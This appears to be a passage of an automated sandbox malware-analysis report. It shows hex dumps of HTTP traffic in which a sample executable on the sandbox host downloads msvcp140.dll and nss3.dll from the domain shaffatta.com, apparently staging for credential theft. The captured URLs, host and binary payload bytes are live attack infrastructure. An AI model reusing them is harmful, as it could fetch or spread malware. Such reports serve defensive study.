                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 8b 06 88 5c 38 04 89 fb b9 d3 4d 62 10 8b 7d f0 89 f8 f7 e1 89 d1 c1 e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3
                                                                                                    Data Ascii: \8Mb})0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 83 1e 01 00 00 8b 45 ec 8d 04 85 00 00 00 00 8d 04 40 50 e8 16 bf 00 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83
                                                                                                    Data Ascii: E@PEN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 83 c4 0c e9 c1 fe ff ff b8 05 00 00 00 e9 4c fd ff ff b8 04 00 00 00 e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc
                                                                                                    Data Ascii: LBH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 56 e8 a8 d3 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 9b 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a
                                                                                                    Data Ascii: VL$4|$D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjj
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 01 00 00 0f 87 78 01 00 00 a1 c8 e3 08 10 64 8b 0d 2c 00 00 00 8b 04 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14
                                                                                                    Data Ascii: xd,D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T$
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: da 00 00 00 80 49 04 01 8b 42 04 89 c3 83 e3 fe 0f 84 c0 02 00 00 8b 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b
                                                                                                    Data Ascii: IBBD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCK
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 4b 85 d2 8b 7c 24 14 75 a5 e9 e0 00 00 00 31 db 43 85 d2 75 18 f6 c1 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1
                                                                                                    Data Ascii: K|$u1CuDL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$D


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.449748168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:37 UTC93OUTGET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:38 UTC286INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:38 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 450024
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "6dde8-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:38 UTC16098INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 65 00 2d 00 69 00 6c 00 00 00 68 00 69 00 2d 00 69 00 6e 00 00 00 68 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d
                                                                                                    Data Ascii: e-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkm
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 00 00 18 00 00 00 04 00 00 00 d8 4c 06 10 f4 8a 00 10 00 00 00 00 00 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30
                                                                                                    Data Ascii: Lx{|L@DX}0}}M@4}0}}4M@tXM}0
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: e8 6a f6 ff ff 0f bf 45 fc 50 ff 75 f0 e8 fb f7 ff ff 8b 45 f0 83 c4 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9
                                                                                                    Data Ascii: jEPuEE]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 54 75 7f 0f b7 0c 38 83 f9 79 74 05 83 f9 59 75 71 8d 77 02 03 f0 eb 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10
                                                                                                    Data Ascii: Tu8ytYuqwjatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 0c c1 e8 02 24 01 c3 8b 49 04 85 c9 75 06 b8 56 52 00 10 c3 8b 41 18 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4
                                                                                                    Data Ascii: $IuVRAuAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMh
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: b2 ff ff 8b f0 8d 4e 01 51 e8 2f 95 ff ff 0f be 4d 10 53 89 77 14 8b f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00
                                                                                                    Data Ascii: NQ/MSwQVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 08 83 eb 08 89 45 e0 89 5d dc 85 c0 0f 89 4b fe ff ff 8b 75 d8 8b 55 e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33
                                                                                                    Data Ascii: E]KuUu;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV33
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: 00 10 e8 07 56 00 00 8b c6 e8 66 c5 01 00 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28
                                                                                                    Data Ascii: VfUQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(
                                                                                                    2024-05-03 09:21:38 UTC16384INData Raw: e8 88 45 d8 50 8d 4d d8 c6 45 fc 0c e8 b4 18 ff ff ff 75 98 8b cf 33 f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10
                                                                                                    Data Ascii: EPMEu3s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.449749168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:39 UTC89OUTGET /d32e011d2eaa85a0/nss3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:40 UTC288INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:39 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 2046288
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "1f3950-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:40 UTC16096INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 0f 8e 17 01 00 00 0f bf 41 18 69 d8 7b 14 00 00 89 da c1 fa 13 89 de c1 ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41
                                                                                                    Data Ascii: Ai{kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fA
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 03 00 00 8b 44 24 04 8b 4c 24 08 8b 7c 81 10 0f b7 47 06 8d 4c 24 50 50 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24
                                                                                                    Data Ascii: D$L$|GL$PPhRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$
